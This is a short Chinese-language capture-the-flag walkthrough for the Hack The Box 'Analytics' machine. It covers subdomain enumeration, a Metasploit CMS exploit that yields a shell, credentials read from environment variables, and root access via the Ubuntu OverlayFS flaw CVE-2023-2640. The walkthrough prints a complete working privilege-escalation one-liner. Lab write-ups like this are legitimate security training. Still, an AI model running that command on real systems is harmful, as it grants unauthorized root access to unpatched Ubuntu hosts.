HTB-Analytics

一、信息收集

绑定hosts文件

HTB-Analytics_第1张图片

使用gobuster工具爆破子域名,爆出了一个地址

HTB-Analytics_第2张图片

是一个登录页面

HTB-Analytics_第3张图片

二、漏洞利用

发现这个cms存在漏洞

HTB-Analytics_第4张图片

msfconsole里面有脚本

HTB-Analytics_第5张图片

拿到shell

HTB-Analytics_第6张图片

查看环境变量里面发现账号:metalytics 密码:An4lytics_ds20223#

HTB-Analytics_第7张图片

连接成功

HTB-Analytics_第8张图片

三、权限提升

查看系统版本号

找到提权漏洞https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/?rdt=39411

HTB-Analytics_第9张图片

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("输入命令")'

你可能感兴趣的:(#,HTB,安全,web安全)